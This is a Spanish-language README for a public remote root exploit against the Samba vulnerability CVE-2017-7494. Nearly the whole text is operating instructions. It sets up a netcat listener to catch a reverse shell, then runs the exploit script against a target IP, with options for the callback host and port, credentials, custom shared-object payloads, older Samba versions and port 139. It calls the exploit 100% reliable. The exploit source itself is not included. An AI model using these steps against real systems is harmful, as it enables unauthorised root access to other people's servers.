
Exploit remoto de root para la vulnerabilidad CVE-2017-7494 de SAMBA
Exploit remoto como root para la vulnerabilidad SAMBA CVE-2017-7494.
Este exploit se divide en 2 partes:
Mientras el objetivo sea vulnerable y el payload sea el correcto para el sistema operativo y arquitectura del objetivo, el exploit es 100% fiable.
En tu máquina, ejecuta el siguiente comando:
$ nc -p 31337 -l
Luego, ejecuta el exploit contra tu objetivo y espera hasta que se conecte de vuelta a tu Netcat:
$ python cve_2017_7494.py -t target_ip
Si cierras demasiado rápido la reverse shell, en lugar de volver a ejecutar el exploit subiendo el módulo, etc... puedes simplemente pasar la ruta al módulo que ya subió. Suponiendo que se subió a /shared/directory/ como "module.so", ejecutarías un comando como el siguiente:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Ahora puedes ejecutar el exploit contra samba 3.5.0 y 3.6.0, solo necesitas agregar el argumento -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Ahora puedes usar tu propio .so personalizado
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
En caso de que necesites ejecutar este script desde una máquina x86, la compilación de los binarios implant creará dos archivos x86. Usando la bandera -n 1 puedes deshabilitar la compilación y copiar libimplantx64.so desde otra máquina.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
En caso de que samba se ejecute solo en el puerto 139. Puedes establecer el puerto del servidor remoto usando el argumento -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Ya no lo soporto.
-- Joxean Koret